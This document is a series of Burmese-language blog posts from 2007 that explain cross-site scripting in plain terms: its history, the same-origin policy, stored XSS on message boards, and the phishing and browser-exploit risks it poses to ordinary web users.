  • အင္တာနက္သံုးသူမ်ားအေနျဖင့္ မိမိ၏အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲအတြင္းရွိ စာမ်က္ႏွာမ်ားတြင္သာ သေကၤတမ်ား ျပန္လည္ထည့္သြင္းလိုက္သလိုမွ်သာ ျဖစ္ေနေသာေၾကာင့္
  • ဆိုးဆိုးရြားရြား ျပႆနာတစ္ရပ္အေနျဖင့္ ေပၚလာခဲ့ျခင္း မရွိေပ။
  • သို႕ရာတြင္ တိုက္ခိုက္မွဳလုပ္ေဆာင္လိုသူတစ္ဦးအေနျဖင့္ Social Engineering နည္းပညာအခ်ဳိ႕ကို အသံုးျပဳျပီး
    • အင္တာနက္သံုးသူတစ္ဦးထံသို႕
    • ၄င္းအတြက္ အလုပ္လုပ္ေပးမည့္ သေကၤတမ်ား ပါ၀င္ေနေသာ စာမ်က္ႏွာတစ္ခုထံသို႕ ေရာက္ရွိေစမည့္ အင္တာနက္လိပ္စာတစ္ခုကို ဖြင့္ၾကည့္မိေစရန္ စည္းရုံးသိမ္းသြင္း ႏိုင္ေစသည့္ အခြင့္အေရး ရရွိေစႏိုင္လာသည္။
(Social Engineering - မသိနားမလည္သူ၊ အင္တာနက္သံုးသူမ်ား၏ အားနည္းခ်က္ကို အခြင့္ေကာင္းယူျပီး ထိုသူမ်ားထံမွ အေရးၾကီးေသာ ကိုယ္ေရးအခ်က္အလက္မ်ား ေငြေၾကးဆိုင္ရာအခ်က္အလက္မ်ား လွည့္ပတ္ရယူျပီး အျမတ္ထုတ္ျခင္း - သီးျခားေဖာ္ျပပါမည္)

အားနည္းခ်က္ (၃)

အားနည္းခ်က္ (၃)ကို သိမ္းဆည္းထားေသာ (သို႕) အျမဲရွိေနေသာ (သို႕) ဒုတိယအဆင့္ ေပ်ာ႕ကြက္၊အားနည္းခ်က္ ဟု ေျပာေလ့ ရွိၾကသည္။ အစြမ္းအထက္ဆံုးေသာ တိုက္ခိုက္မႈအမ်ဳိးအစားမ်ား ျဖစ္ေပၚေစႏိုင္သည္။
ဥပမာတစ္ခု အေနျဖင့္
  • အင္တာနက္ေပၚရွိေနရာ (သို႕) ဆာဗာ (သို႕) ဖိုင္သိုေလွာင္သိမ္းဆည္းေရးစနစ္ တစ္ခုခု အတြင္းသို႕ အသံုးျပဳေနသူတစ္ဦးက (ပထမလူ-တိုက္ခိုက္သူူ) အခ်က္အလက္မ်ားကို ေပးပို႕ ထည့္သြင္းသိမ္းဆည္းလိုက္သည္။
  • ေနာက္တစ္ခ်ိန္တြင္ အျခားေသာ အသံုးျပဳသူတစ္ဦးက (ဒုတိယလူ-သားေကာင္) ၄င္းစာမ်က္ႏွာကို ဖြင့္ၾကည့္လိုက္မိသည့္အခါတြင္ တိုက္ခိုက္သူဆင္ထားေသာ ေထာင္ေခ်ာက္ထဲသို႕ ေရာက္ရွိသြားရေတာ႕သည္။
  • အထူး စံထားျပသႏိုင္သည့္ ဥပမာတစ္ရပ္မွာ Online Message Boards မ်ားျဖစ္သည္။
  • ၄င္းေနရာမ်ားသည္ အျခားေသာ ၾကည့္ရႈသူမ်ားဖတ္ရႈႏိုင္ရန္အတြက္ HTML သေကၤတမ်ားကို ထည့္သြင္းႏိုင္ရန္ လမ္းဖြင့္ေပးထားျခင္း ေၾကာင့္ျဖစ္သည္။
ဤအားနည္းခ်က္မ်ားမွာ အမ်ားအားျဖင့္ အျခားေသာအမ်ဳိးအစားမ်ားထက္ သိသိသာသာ အက်ဳိးသက္ေရာက္မႈျဖစ္ေစသည္။ အေၾကာင္းမွာ တိုက္ခိုက္သူတစ္ဦး အေနျဖင့္ သေကၤတ (Script) အခ်ဳိ႕ထည့္သြင္းေပးလိုက္ရုံသာ ျဖစ္ျပီး အျခားေသာ သားေကာင္ အေျမာက္အမ်ားကို တိုက္ခိုက္ႏိုင္ေသာေၾကာင့္ ျဖစ္ေပသည္။

သားေကာင္၏ ကြန္ပ်ဳတာမ်ားအတြင္းသို႕ သေကၤတမ်ား ထည့္သြင္းတိုက္ခိုက္ပံု နည္းစနစ္မ်ား (Methods of Injection) မွာ အမ်ဳိးမ်ဳိး ေျပာင္းလဲေနႏိုင္သည္။
  • တိုက္ခိုက္သူတစ္ဦးသည္ အထက္တြင္ေဖာ္ျပထားခဲ့ေသာ ေပ်ာ့ကြက္၊ ဟာကြက္မ်ား သားေကာင္၏ ကြန္ပ်ဳတာေပၚတြင္ ျဖစ္ေပၚလာေစရန္အတြက္ အင္တာနက္အသံုခ်ေဆာ့ဖ္၀ဲ (Web Application) တစ္ခုခုကို အသံုးျပဳရန္ လိုခ်င္မွ လိုမည္ျဖစ္သည္။
  • အင္တာနက္ အသံုးခ်ေဆာ့ဖ္၀ဲ (အီးေမးလ္ ၊ System log စသည့္) အရာတစ္ခုခုမွ လက္ခံရရွိလိုက္သည့္ (တိုက္ခိုက္သူတစ္ဦးမွ ထိန္းခ်ဳပ္ထားႏိုင္ေခ်ရွိေနေသာ) မည္သည့္ အခ်က္အလက္မဆိုသည္ အသက္၀င္ ေနေသာ စာမ်က္ႏွာတစ္ခုအျဖစ္ (Dynamic page) ျပန္လည္ေဖာ္ျပရမည့္ေနရာတြင္
  • ရွိသင့္ရွိထိုက္ေသာ သက္ဆိုင္ရာ သေကၤတမ်ားျဖင့္ အျပည့္အ၀ ပါရွိေနရမည္ ျဖစ္သည္။
  • အကယ္၍ ပါရွိမေနပါက ရလာဒ္အေနျဖင့္ XSS ဆိုင္ရာ ဂယ္ေပါက္ တစ္ခု ျဖစ္ေပၚလာမည္ ျဖစ္ေပသည္။
အေျခအေနအမ်ဳိးမ်ဳိးေၾကာင့္ အခုေဖာ္ျပထားတာေတြကို အေတာ္ေလးအခ်ိန္ယူ ဘာသာျပန္လိုက္ရပါတယ္ ... နည္းပညာ တစ္ခုျဖစ္ေနတာေရာ ကိုယ္နဲ႕ေ၀းတဲ့ အေၾကာင္းအရာတစ္ခုျဖစ္ေနတာေၾကာင့္ေရာ အေတာ္ေလး ေခါင္းစားခဲ့ပါတယ္ ပညာလည္း အေတာ္ရလိုက္ပါတယ္ ... အခုေဖာ္ျပထားတာေတြက မျပည့္စံုေသးပါဘူး စာေၾကာင္းေတြက ရွည္ေနတဲ့ အတြက္ သည္းခံဖတ္ေပးေစခ်င္ပါတယ္ ... ေနာက္ထပ္ ဆက္ျပီး ဘယ္လို အတိုက္ခိုက္ခံရႏိုင္တာလဲ ... ဘယ္လို အကာအကြယ္ေတြ လုပ္မလဲ ဆိုတာေတြကို နမူနာေတြ ရုပ္ရွင္ေတြနဲ႕ ရွာေဖြ ေဖာ္ျပသြားမွာပါ ....

ဆက္လက္ေဖာ္ျပပါမည္ ....

Jun 29, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - အသံုးအႏႈံးမ်ား


အသံုးအႏႈံးမ်ား
အေစာပိုင္းကာလေတြတုန္းကေတာ႕
CSS လို႕အတိုေကာက္ ေျပာရင္ Cross-Side Scripting ရဲ႕ အားနည္းခ်က္ေတြကို ေျပာတယ္ဆိုတာ
နားလည္ခဲ့ၾကပါတယ္။ ဒါေပမယ့္လည္း ေနာက္ပိုင္းမွာ ဆက္လက္ထြက္ေပၚလာတဲ့ -

  • Cascading-Style Sheets - အင္တာနက္စာမ်က္ႏွာေတြ ေရးသားတ့ဲအခါ အဆင္အျပင္ ပိုျပီးၾကည့္ေကာင္းေအာင္ အသံုးျပဳရတဲ့ ဘာသာစကားတစ္မ်ဳိး နဲ႕
  • Content Scrambling System - စီးပြားျဖစ္ထုတ္လုပ္တဲ့ ဒီဗီြဒီေတြမွာအထဲမွာပါ၀င္တဲ့ အေၾကာင္းအရာေတြကို အျခားသူေတြ အလြယ္တကူ ၾကည့္လို႕မရေအာင္ ဖန္တီး(Encrypt) လုပ္ထား၊ ေရာေမႊထားတဲ့နည္းစနစ္
ေတြရဲ႕ အတိုေကာက္ စာလံုးေတြနဲ႕ မွားယြင္းစရာ ျဖစ္လာပါတယ္ ...

Steve Champeon

XSS ဆိုတဲ့ အတိုေကာက္စကားလံုးကို ပထမဆံုးစျပီးသံုးခဲ့တဲ့ သူကေတာ့ Steve Champeon ဆိုတဲ့ပုဂၢိဳလ္ျဖစ္ပါတယ္။ သူဟာ webmonkey.com ဆိုတဲ့ အင္တာနက္စာမ်က္ႏွာေတြ ေရးသားတည္ေဆာက္တဲ့ နည္းလမ္းေတြအေၾကာင္း အစကေန အဆံုးအထိ အမ်ဳိးမ်ဳိးရွင္းျပထားတဲ့ Online Tutorial ၀က္ဘ္ဆိုဒ္မွာ "XSS, Trust, and Barney" ဆိုတဲ့ ေခါင္းစဥ္နဲ႕ Cross-Side Scripting အေၾကာင္းကို XSS ဆိုတဲ့ အေခၚအေ၀ၚနဲ႕ စတင္ေရးသားခဲ့တာပါ။ ေနာက္ပိုင္းမွာ လံုျခံဳေရးနည္းပညာ အသိုင္းအ၀ိုင္းတစ္ခုလံုးက ဒီအေျပာင္းအလဲကို အလ်င္အျမန္ပဲ လက္ခံအသံုးျပဳခဲ့ၾကပါတယ္။

အခုအခ်ိန္မွာဆိုရင္ Cross-Side Scripting ကို CSS ရယ္လို႕ အလြန္အသံုးနည္းသြားပါျပီ။
သံုးထားခဲ့ျပီးသား အင္တာနက္စာမ်က္ႏွာအခ်ဳိ႕မွာပဲ က်န္ေနပါေတာ႕တယ္ ...

(ေနာက္လာမယ့္ အေၾကာင္းအရာေတြက ပညာရပ္ပိုင္းဆိုင္ရာ အခက္အခဲေလးေတြရွိေနလို႕ အခ်ိ္န္ေပး ေလ့လာ ဘာသာျပန္ေနရတဲ့ အတြက္ ဒီေနရာမွာပဲ ခဏေလး ရပ္ထားပါ့မယ္ ... ေနာက္ေန႕ မွာ XSS ရဲ႕ေပ်ာ့ကြက္ေတြကို အသံုးခ်ျပီး တိုက္ခိုက္ခံရႏိုင္တဲ့နည္းလမ္းေတြကို ဆက္လက္ေဖာ္ျပေပးပါ့မယ္ ...)

  • webmonkey.com ဆိုတဲ့ ဆိုဒ္ေလးကိုလည္း သြားေလ့လာၾကည့္ၾကဖို႕ web development အေၾကာင္းေလ့လာခ်င္တဲသူေတြကို တိုက္တြန္းခ်င္ပါတယ္ ...
ဆက္လက္ေဖာ္ျပပါမည္ ....


Jun 26, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - မူလေနရာတူညီျခင္း


မူလေနရာတူညီျခင္း

အဓိကအားျဖင့္ေတာ႕ အင္တာနက္ၾကည့္ေဆာဖ့္၀ဲေတြဟာ လက္ရွိေနရာ(စာမ်က္ႏွာ)ကေန အျပင္ဘက္တစ္ေနရာကို ခုန္ကူးရတဲ့ အခါမွာ လံုျခံဳမႈရရွိေစဖို႕အတြက္ Same origin policy ဆိုတဲ့နည္းလမ္းတစ္ခုကို အသံုးျပဳၾကပါတယ္။ JavaScript မွာအသံုးမ်ားပါတယ္။ ဒီနည္းလမ္းကို သံုးလိုက္တဲ့ အတြက္တစ္ေနရာကေန ေနာက္တစ္ေနရာကို သြားရေတာ႕မယ္ဆိုရင္ စိတ္ခ်လက္ခ် သြားလို႕ရပါတယ္။

ဒီနည္းလမ္းေလးရဲ႕ အလုပ္လုပ္ပံုေလးကို ေအာက္မွာ ဇယားေလးနဲ႕ ရွင္းျပထားပါတယ္။
တစ္ေနရာကေန ေနာက္တစ္ေနရာေျပာင္းအကူးအေျပာင္းမွာ
Domain ေတြအခ်င္းခ်င္း Prorocol ေတြအခ်င္းခ်င္း တူေနမွ အေျပာင္းအလဲကို ဆက္လုပ္ႏိုင္ေအာင္ လုပ္ေပးတဲ့နည္းျဖစ္ပါတယ္ …
ဒီနည္းေၾကာင့္ ေကာက္က်စ္စဥ္းလဲတဲ့ ၀က္ဘ္ဆိုက္တစ္ခုဟာ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲရဲ႕ ဖြင့္ထားတဲ့ အျခား window တစ္ခုအတြင္းမွာ ရွိေနတဲ့ အေရးၾကီးတဲ့ အခ်က္အလက္ေတြကို JavaScript အသံုးျပဳျပီး မခိုးယူႏိုင္မွာ ျဖစ္ပါတယ္ …. (ကြန္ပ်ဳတာထဲက အခ်က္အလက္ေတြကို ေျပာတာမဟုတ္ …)

Origin ဆိုတဲ့ အသံုးအႏႈံးက မူလစာမ်က္ႏွာ နဲ႕ ေနာက္ထပ္သြားရမယ့္ စာမ်က္ႏွာေတြၾကားမွာ
အသံုးျပဳထားတဲ့ domain name, protocol နဲ႕ port ေတြ တူေနရမယ္လို႕ ဆိုလိုပါတယ္။ အင္တာနက္ စာမ်က္ႏွာေတြၾကားမွာ အဲဒီအခ်က္ သံုးခ်က္တူညီမႈရွိေနတာကို မူလေနရာတူညီျခင္း Same Origin လို႕ဆိုလိုပါတယ္။ ဒီလိုတူေနမွ စာမ်က္ႏွာတစ္ခုကေန ေနာက္တစ္ခုေျပာင္းရတဲ့အခါ ပါသြားမယ့္ အခ်က္အလက္အခ်ဳိ႕ အတြက္ စိတ္ခ်ရတဲ့ သေဘာပါ။

အထက္က ဇယားေလးကို ေသေသခ်ာခ်ာ ေလ့လာလိုက္ရင္
..www.example.com/dir/page.html.. ဆိုတဲ့ေနရာကေန တျခားေနရာေတြကို သြားျပထားတာ ျဖစ္ပါတယ္ -

  • အေပၚဘက္ႏွစ္ခုကေတာ႕ Same Origin ျဖစ္ျပီးလို႕ဆက္သြားလို႕ရျပီး
  • ေအာက္ဘက္ကေလးခုမွာ protocol မတူတာ၊
  • host (domain) အမည္မတူတာ၊
  • port မတူတာ ေတြေၾကာင့္ အကူးအေျပာင္း မလုပ္ေပးတာ ျမင္ရမွာ ျဖစ္ပါတယ္ …

ဒီသေဘာေလးက ျပင္ပေလာကမွာလည္း အတူတူပါပဲ။ တစ္နယ္တည္းသားအခ်င္း၊ တစ္တန္းတည္းသား အခ်င္းခ်င္း၊ တစ္အိမ္တည္းသားခ်င္း၊ တစ္ေက်ာင္းတည္းထြက္ခ်င္း အစ ရွိတဲ့ မူလေနရာ (Same Origin) တူတဲ့သူ အခ်င္းခ်င္း စိတ္ခ်လက္ခ် ေပါင္းလို႕ရတဲ့ သေဘာအတိုင္းပါပဲ ….
(ခၽြင္းခ်က္ေလးေတြ ရွိႏိုင္တာကို ခဏဖယ္ျပီး စဥ္းစားတာပါ…)

Netscape ကသူ႕ရဲ႕ JavaScript မွာ အဲဒီနည္းလမ္းေလးကို စတင္လိုက္တဲ့အခ်ိန္ကစျပီးေတာ႕
အင္တာနက္အသံုးျပဳသူေတြကို ေကာက္က်စ္စဥ္းလဲတဲ့ website ေတြရဲ႕ အႏၱရာယ္ကေန အကာအကြယ္ေပးႏိုင္ေအာင္ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲ အမ်ဳိးမ်ဳိးနဲ႕ အင္တာနက္အသံုးျပဳသူေတြအတြက္ေရးေပးရတဲ့ (client-side scripting) ပရိုဂရမ္ ဘာသာစကားအမ်ဳိးမ်ဳိးမွာ အလားတူနည္းလမ္း ေတြကို သံုးျပီး အကာအကြယ္ေပးလာ ၾကပါတယ္။

ေယဘုယ်အားျဖင့္ေတာ႕ Cross-site Scripting ဆိုတာဟာ အင္တာနက္ စာမ်က္ႏွာေတြရဲ႕ ေပ်ာ့ကြက္ေတြ၊ အားနည္းခ်က္ေတြကို မသမာသူေတြက ရွာေဖြျပီး သူတို႕ လိုခ်င္တဲ့ ေနရာ၊ လမ္းေၾကာင္းေပၚကို ေရာက္ေအာင္ ဆြဲေခၚသြားတဲ့ နည္းလမ္းေတြပါပဲ ….
မသမာသူတစ္ဦးဟာ အျခားေသာ အင္တာနက္ေနရာ (Domain) မ်ားမွာ တည္ရွိအသံုးျပဳေနတဲ့ စာမ်က္ႏွာမ်ားအတြင္းကို ေကာက္က်စ္ဆိုးရြားတဲ့ သေကၤတေတြ (scripts) ကို နည္းအမ်ဳိးမ်ဳိးနဲ႕ ရွာေဖြထည့္သြင္းျပီး ၊ စာမ်က္ႏွာတစ္ခုအတြင္းမွာပါတဲ့ အေရးၾကီးတဲ့ ကိုယ္ေရးကိုယ္တာအေၾကာင္းအရာေတြ၊ session cookie နဲ႕ အျခားေသာ အေၾကာင္းအရာေတြကို တစ္ဆင့္ျပီးတစ္ဆင့္ ရရွိ အသံုးျပဳသြားႏိုင္တယ္ ဆိုတာေလးကို ေသေသခ်ာခ်ာေလး နားလည္ထားဖို႕ အေရးၾကီးပါတယ္ …

အခုလို သိထားမယ္ဆိုရင္-

  • လင့္ခ္ ေတြ႕တိုင္း ကလစ္လုပ္တာမ်ဳိး၊
  • ပံု လွလွေလး (လွလွေလး :P) ေတြ႕လို႕ ကလစ္လုပ္တာမ်ဳိး ၊
  • စိတ္၀င္းစားေလာက္စရာ စာေၾကာင္းေလးေတြ႕လို႕ ကလစ္လုပ္တာမ်ဳိးေတြကို လုပ္မိေတာ့မယ္ဆိုရင္ အနည္းနဲ႕ အမ်ား သတိထားေနမိေတာ႕မွာ ေသခ်ာပါတယ္ …..

ေအာက္က ဗီဒီယိုေလးကို ျပန္ၾကည့္လိုက္ပါဦးလား ...
ပိုျပီး သေဘာေပါက္သြားတာေပါ့ ….



ဆက္လက္ေဖာ္ျပပါမည္ ....


Jun 25, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - ေနာက္ခံသမိုင္းေၾကာင္း


Cross site scripiting ကို အတိုေကာက္ CSS လို႕ပဲ ေခၚတာပါပဲ။
ဒါေပမယ့္ အခုေတာ႕ မသံုးေတာ႕ပါဘူး။

Netscape ေဆာ့ဖ္၀ဲ ကုမၼဏီဟာ Java Script ဘာသာစကားကို ပထမဆံုးမိတ္ဆက္လိုက္တဲ့ အခ်ိန္က web server တစ္ခုကေန အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲ ေတြဆီကို အလုပ္လုပ္ႏိုင္တဲ့ သေကၤတ (executable code) ေတြပို႕လႊတ္ႏိုင္တဲ့အတြက္ လံုျခံဳေရးဆိုင္ရာ စြန္႔စားမႈတစ္ရပ္ ဆိုတာကို သိခဲ့ၾက ပါတယ္။

ဒါနဲ႕ ပါတ္သက္တဲ့ အဓိက ေသာ႕ခ်က္ျပႆနာတစ္ရပ္ကေတာ႕ user ေတြက တျပိဳင္တည္းမွာ browser ၀င္းဒိုးေတြ အမ်ားၾကီးကို ဖြင့္တဲ့အခ်ိန္ပါဘဲ။ အခ်ိဳ႕ အေျခအေနေတြမွာ စာမ်က္ႏွာ တစ္ခုမွာပါေနတဲ့ Script ေတြကအျခားစာမ်က္ႏွာတစ္ခု သို႕မဟုတ္ အျခားစာမ်က္ႏွာထဲက အရာ၀တၳဳ တစ္ခုခုဆီကို လွမ္းျပီး ဆက္သြယ္တာကို အေျခအေနအရ ကိုယ္ကိုယ္တိုင္က ခြင့္ျပဳေပးရတာမ်ဳိး ရွိတတ္ပါတယ္။

အထူးသျဖင့္ မလႊဲမေရွာင္သာခြင့္ျပဳေနရတာေတြ ကေတာ႕ -

  • email ေတြထဲမွာပါလာတဲ့ လိပ္စာေတြ
  • တျခားျပင္ပ စာမ်က္ႏွာတစ္ခုကို လွမ္းဖြင့္ရမယ့္ link (external link) ေတြ
  • ကလစ္လုပ္ျပီးၾကည့္မွ ျမင္ရမယ့္ ရုပ္ပံုေတြ
  • ေဒါင္းလုဒ္ ခ်မွရမယ့္ ဖိုင္ေတြ - ျဖစ္ပါတယ္


ဒါေပမယ့္ ဒီလို လုပ္တဲ့အခါမ်ုိးမွာ အထူးသတိထားဖို႕ လိုအပ္ပါတယ္။
ေကာက္က်စ္စဥ္းလဲတဲ့ ၀က္ဘ္ဆိုက္ တစ္ခုခုက ကိုယ့္ဆီကေန သူတို႕လိုခ်င္တဲ့ အခ်က္အလက္ေတြကို ဒီနည္းနဲ႕ ဆြဲယူသြားႏိုင္လို႕ ပဲျဖစ္ပါတယ္။ ဘယ္လို လုပ္သြားတာလဲ နည္းနည္းေလ့လာ ၾကည့္ၾက ပါစို႕လား ။

ကၽြန္ေတာ္တို႔တေတြ လင့္ခ္တစ္ခုခုကို (ဥပမာ - www.examplewebsite.com) ကလစ္ လုပ္လိုက္ျပီဆိုတာနဲ႔ ကၽြန္ေတာ္တို႔ိရဲ႕ အင္တာနက္ၾကည့္တဲ့ ေဆာ့ဖ္၀ဲက အဲဒီလိပ္စာအတိုင္း လိုက္သြားျပီးေတာ႕ အဲဒီလင့္ခ္နဲ႕ဆိုင္တဲ့ စာမ်က္ႏွာ၊ ရုပ္ပံု အစရွိတဲ့ အရာတစ္ခုခု (သို႕မဟုတ္) အမ်ားကို ဖြင့္ခြင့္ေပးဖို႕ Servrer ကေနေတာင္းဆိုတဲ့အလုပ္ ကိုလုပ္ပါတယ္။

အဲဒီအခါမွာပဲ အဲဒီ Server နဲ႕ ကၽြန္ေတာ္တို႔ကြန္ပ်ဳတာ အဆက္အသြယ္ရေနျပီ ျဖစ္ပါတယ္။ ကိုယ္ကေတာ႕ လင့္ခ္ေလးတစ္ခုကို ကလစ္လုပ္လိုက္တာပါဘဲ .... ဒါေပမယ့္ ေနာက္ကြယ္က ကိုယ္မျမင္ရတဲ့ေနရာမွာ အေျပာင္းအလဲေတြ အမ်ားၾကီးျဖစ္သြားပါတယ္။ အရမ္းသတိထားရမယ့္ အလုပ္တစ္ခုပါ။
အဲဒီအခ်ိန္မွာပဲ Server ကေပးပို႕လိုက္တဲ့ အရာေတြက ကိုယ့္ရဲ႕ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲေပၚမွာ အလုပ္လုပ္ေနျပီျဖစ္ပါတယ္ ...
ပိုျပီးရွင္းရွင္းလင္းလင္း ျမင္ခ်င္တယ္ဆိုရင္ေတာ႕ အင္တာနက္လိပ္စာတစ္ခုကို ဖြင့္ေနတုန္းမွာ ကိုယ့္ရဲ႕ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲရဲ႕ Status bar ကို ေစာင့္ၾကည့္ေနလိုက္ပါ …
  • connecting to www.servername.com ….
  • waiting for www.servername.com ....
  • transferring dada from www.servername.com ….
  • opening page www.servername.com ….
  • Sendig request to www.servername.com ……
  • receiving items from www.servernames.com ….
အစရွိတဲ့ ေဖာ္ျပခ်က္မ်ိဳးေတြ တစ္ခုျပီးတစ္ခု ျမင္ရမွာျဖစ္ပါတယ္ ...

တကယ္လို႕ ဒုကၡေပးမယ့္ အရာေတြ ကိုယ့္ကြန္ပ်ဳတာထဲက အခ်က္အလက္ေတြ ႏိႈက္ထုတ္ ခိုးယူေတာ႕မယ့္ အရာေတြပါလာျပီဆိုရင္လည္း အလုပ္စေနျပီ ျဖစ္ပါတယ္ ….
ကိုယ့္ဘက္က ေတာင္းဆိုလိုက္ျပီဆိုကတဲက Server မွာ ဘယ္ေနရာကေတာင္းဆိုေနတာလဲ၊ ဘာေဆာ့ဖ္၀ဲ သံုးထားလဲ အစရွိတဲ့ ကၽြန္ေတာ္တို႕ရဲ႕ အခ်က္အလက္တစ္ခ်ဳိ႕ ပါသြားျပီျဖစ္ပါတယ္

ဒီအေၾကာင္းအရာေလးနဲ႕ ဆင္တူျဖစ္ရပ္ေလးကို Symantec ကေနအခုလို ဗီဒီယိုေလးနဲ႕ ရွင္းျပထားတာ ရွိပါတယ္။ ေလ့လာၾကည့္ၾကပါ ခင္ဗ်ာ ….



ဆက္လက္ေဖာ္ျပပါမည္ ....

Jun 24, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting


ဒီရက္ပိုင္းေတြမွာ ကၽြန္ေတာ္ XSS သို႕မဟုတ္ Cross-Site Scripting ဆိုတာေလးကို
ေလ႕လာေနမိပါတယ္။ အေတာ္ေလး စိတ္၀င္စားစရာေကာင္းတဲ့
အေၾကာင္းအရာ တစ္ခုလည္းျဖစ္ပါတယ္။
ဒါဟာ -

  • ကြန္ပ်ဳတာသံုးေနတဲ့ သူေတြရဲ႕ မသိနားမလည္မႈ၊ ဗဟုသုတ နည္းပါးမႈေတြကို
  • အခြင့္အေရးတစ္ခုလို အသံုးခ်တတ္တဲ့ ေကာက္က်စ္ စဥ္းလဲတဲ့ Web User ေတြက
  • တျခားေသာ မသိနားမလည္သူေတြၾကည့္ရႈမည့္ Web စာမ်က္ႏွာမ်ား အတြင္းမွာ
  • သူ႕တို႕အတြက္ အလုပ္လုပ္ေပးမယ့္ သေကၤတ Code ေတြကို တိတ္တဆိတ္ထည့္သြင္းေပး လိုက္ႏိုင္တဲ့ Web Application ေတြမွာ ေတြ႕ရတတ္တဲ့
  • ကြန္ပ်ုဳတာေတြရဲ႕ လံုျခံဳေရးနဲ႕ သက္ဆိုင္တဲ ့နည္းပညာတစ္ခု ျဖစ္ပါတယ္။
အဲဒီ သေကၤတေတြထဲကအခ်ဳိ႕ကို ဥပမာအေနနဲ႕ ေဖာ္ျပရရင္ -
  • HTML သေကၤတေတြနဲ႕
  • Client-side script ေတြ ပါ၀င္ပါတယ္ ။
Client-side script ဆိုတာကေတာ႕ -
  • web page ေတြကို ၾကည့္ရႈမယ့္ user ေတြရဲ႕ အင္တာနက္ၾကည့္ေဆာ႕ဖ္၀ဲ - Browser ေပၚမွာ အလုပ္လုပ္ေအာင္ ဖန္တီးေရးသားထားေသာ၊
  • user ေတြရဲ႕ ေဆာင္ရြက္ခ်က္ေတြ၊ ေနရာေဒသေတြ၊ ပတ္၀န္းက်င္အေျခအေနေတြ အေပၚမူတည္ျပီး web page ထဲက အေၾကာင္းအရာမ်ားကို အလိုက္သင့္ ေျပာင္းလဲ ေနေအာင္ ဖန္တီးေရးသားထားေသာ
  • အင္တာနက္ စာမ်က္ႏွာမ်ားအတြင္းက ကြန္ပ်ဳတာ ပရိုဂရမ္ အတန္းအစား တစ္ခုျဖစ္ပါတယ္ ...
  • အမ်ားအားျဖင့္ HTML, Java Script (client-side Java Script), Images, ActiveX, Java ဘာသာစကားမ်ဳိးေတြ နဲ႕ အျခားေသာ အင္တာနက္နည္းပညာေတြကိုု သံုးျပီး ေရးေလ့ရွိၾကပါတယ္ ...
ဒီလိုတိုက္ခိုက္မႈေတြမွာ ဘာေတြပါ၀င္လဲဆိုေတာ႕ -
  • Phishing - လုိ႕ေခၚတဲ့ user name ေတြ , password ေတြနဲ႕ credit card ဆိုင္ရာ အေသးစိတ္အခ်က္အလက္မ်ား စတဲ့ အေရးၾကီးတဲ့ အခ်က္အလက္ေတြကို တိတ္တဆိတ္ ႏိႈက္ထုတ္ယူေဆာင္ျခင္း
  • Browser exploit - လို႕ေခၚတဲ့ အင္တာနက္ၾကည့္ Browser ရဲ႕ ေဆာ႕ဖ္၀ဲ ဆိုင္ရာ အားနည္းခ်က္တစ္ခုခုကို အသံုးခ်ျပီး - Browser ေဆာ႕ဖ္၀ဲကို ရပ္တန္႕ပစ္လိုက္ျခင္း၊ user ကြန္ပ်ဳတာထဲက ဖိုင္ေတြကို ဖတ္ရႈ ေရးသားျခင္း၊ ဗိုင္းရပ္စ္မ်ားထည့္သြင္းျခင္း နဲ႕ ေထာက္လွမ္းေရးေဆာ႕ဖ္၀ဲ ( spyware ) မ်ား ထည့္သြင္းလိုက္ျခင္း
အစရွိတဲ့ အရာေတြပါ၀င္ပါတယ္ ...

ဆက္လက္ေဖာ္ျပပါမည္ ....